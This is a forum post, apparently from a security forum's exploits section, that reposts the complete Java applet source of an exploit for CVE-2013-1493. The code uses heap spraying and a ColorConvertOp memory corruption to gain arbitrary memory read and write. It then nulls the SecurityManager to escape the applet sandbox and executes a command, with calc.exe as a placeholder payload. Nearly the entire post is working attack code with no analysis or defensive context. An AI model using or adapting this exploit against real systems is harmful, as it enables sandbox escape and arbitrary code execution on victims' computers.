Jump to content
thehat

Java CVE-2013-1493 exploit

By thehat, in Exploituri

Recommended Posts

thehat Newbie

thehat

Posted
Posted

Java CVE-2013-1493 exploit

import java.applet.Applet;
import java.awt.color.ColorSpace;
import java.awt.image.BufferedImage;
import java.awt.image.ColorConvertOp;
import java.awt.image.ColorModel;
import java.awt.image.ComponentColorModel;
import java.awt.image.ComponentSampleModel;
import java.awt.image.SampleModel;


public class Init extends Applet {

  private static final long serialVersionUID = 1L;
  static final int ARRAY_MAGIC = -1341411317;
  static final int ARRAY_OLDSIZE = 11;
  static final int ARRAY_NEWSIZE = 2147483647;
  static final int LEAK_MAGIC = -559035650;
  static final int SPRAY_ARRAY_COUNT = 2808685;
  static final int SPRAY_LEAK_COUNT = 2000000;
  volatile Leak[] _sleaks;
  volatile int[][] _sarrays;
  volatile int[] _bigArray;
  int[] _memBaseObj;
  long _memBaseIdx;
  long _memBasePtr;
  int[] soffsets;
  int[] doffsets;


  public Init()
  {
    this.soffsets = new int[] { 0, 1, 2, 3 };

    this.doffsets = new int[] { 0, 1, 2, 50000000 };
  }

  void spray()
    throws Exception
  {
    Runtime.getRuntime().gc();
    Runtime.getRuntime().gc();

    this._sleaks = new Leak[2000000];
    this._sarrays = new int[2808685][];
    try
    {
      for (int i = 0; i < this._sarrays.length; i++) {
        this._sarrays[i] = new int[11];
        for (int j = 0; j < this._sarrays[i].length; j++) {
          this._sarrays[i][j] = -1341411317;
        }
      }

      for (int i = 0; i < this._sleaks.length; i++)
        this._sleaks[i] = new Leak("L");
    }
    catch (OutOfMemoryError localOutOfMemoryError)
    {
    }
  }

  void getBigArray()
    throws Exception
  {
    for (int i = 0; i < this._sarrays.length; i++) {
      for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
        this._sarrays[i][j] = -1341411317;
      }
    }

    for (int i = 0; i < this._sarrays.length; i++) {
      if (this._sarrays[i].length != 2147483647) {
        for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
          if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
            this._sarrays[i][(j - 1)] = 2147483647;
          }
        }
      }
    }

    for (int i = 0; i < this._sarrays.length; i++) {
      if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647))
        continue;
      this._bigArray = this._sarrays[i];
    }

    if (this._bigArray == null)
      throw new Exception("fail");
  }

  long getAddress(Object obj)
    throws Exception
  {
    for (int i = 0; i < this._bigArray.length; i++) {
      if (this._bigArray[i] == -559035650) {
        int flag = 0;

        for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
        flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);

        for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
        flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);

        if (flag == 2) {
          for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
          return this._bigArray[(i + 1)];
        }
      }
    }

    throw new Exception("fail");
  }

  void getMemBase()
    throws Exception
  {
    for (int i = 0; i < this._sarrays.length; i++) {
      for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
        this._sarrays[i][j] = (j == 1 ? i : -1341411317);
      }
    }

    for (int i = 0; i < this._bigArray.length; i++) {
      if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
        int len = this._bigArray[(i - 1)];
        int idx = this._bigArray[(i + 1)];
        if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
          this._memBaseObj = this._sarrays[idx];
          this._memBaseIdx = i;
          break;
        }
      }
    }

    if (this._memBaseObj == null) {
      throw new Exception("fail");
    }

    this._memBasePtr = getAddress(this._memBaseObj);

    if (this._memBasePtr == 0L) {
      throw new Exception("fail");
    }

    this._memBasePtr += 12L;
  }

  int rdMem(long addr)
  {
    long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
    if ((offs >= 0L) && (offs < 2147483647L)) {
      return this._bigArray[(int)offs];
    }
    return 0;
  }

  void wrMem(long addr, int value)
  {
    long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
    if ((offs >= 0L) && (offs < 2147483647L))
      this._bigArray[(int)offs] = value;
  }

  void privileged()
  {
    try
    {
        Runtime.getRuntime().exec("calc.exe");
    } catch (Exception localException) {
      localException.printStackTrace();
    }
  }


  public void init()
  {
    try
    {
      if (System.getSecurityManager() == null) {
        privileged();
        return;
      }

      int sWidth = 168; int sHeight = 1;
      int spStride = 4; int ssStride = spStride * sWidth;

      int dWidth = sWidth; int dHeight = sHeight;
      int dpStride = 1; int dsStride = 0;

      ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1);
      ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
      SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
      BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);

      for (int i = 0; i < ssStride; i++) {
        sbi.getRaster().getDataBuffer().setElem(i, 1);
      }

      ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1);
      ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
      SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
      BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);

      ColorConvertOp cco = new ColorConvertOp(null);

      spray();
      try
      {
        cco.filter(sbi, dbi);
      }
      catch (Exception localException) { }
      getBigArray();

      getMemBase();

      long sys = getAddress(System.class);
      long sm = getAddress(System.getSecurityManager());
      sys = rdMem(sys + 4L);
      for (int i = 0; i < 2000000; i++) {
        long addr = sys + i * 4;
        int val = rdMem(addr);
        if (val == sm) {
          wrMem(addr, 0);
          if (System.getSecurityManager() == null) {
            break;
          }
        }
      }
      privileged();
    }
    catch (Exception localException1)
    {
    }
  }


}




class Leak
{
    public volatile int magic;
    public volatile Object obj;
    public volatile Object obj2;
    public volatile Object obj3;
    public volatile Object obj4;

    public Leak(Object o)
    {
      this.magic = -559035650;
      this.obj = o;
    }
}





import java.awt.image.BufferedImage;
import java.awt.image.ColorModel;
import java.awt.image.SampleModel;

class MyBufferedImage extends BufferedImage
  {
    int _fakeType;
    ColorModel _fakeColorModel;
    SampleModel _fakeSampleModel;

    public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
    {
      super(width,height, imageType);

      this._fakeType = fakeType;
      this._fakeColorModel = fakeColorModel;
      this._fakeSampleModel = fakeSampleModel;
    }

    public int getType()
    {
      String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
      if (caller.contains("ICC_Transform.getImageLayout(")) {
        return this._fakeType;
      }

      return super.getType();
    }

    public ColorModel getColorModel()
    {
      String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
      if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
        return this._fakeColorModel;
      }

      return super.getColorModel();
    }

    public SampleModel getSampleModel()
    {
      String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
      if (caller.contains("ICC_Transform.getImageLayout(")) {
        return this._fakeSampleModel;
      }

      return super.getSampleModel();
    }
  }






import java.awt.color.ColorSpace;

class MyColorSpace extends ColorSpace
  {
    private static final long serialVersionUID = 1L;

    public MyColorSpace(int type, int numcomponents)
    {
      super(type,numcomponents); 
    } 
    public float[] fromCIEXYZ(float[] value) { return null; } 
    public float[] toCIEXYZ(float[] value) { return null; } 
    public float[] fromRGB(float[] value) { return null; } 
    public float[] toRGB(float[] value) { return null;    }
  }

Sursa: #6581034 - Pastie

  • Upvote 1
  • Downvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...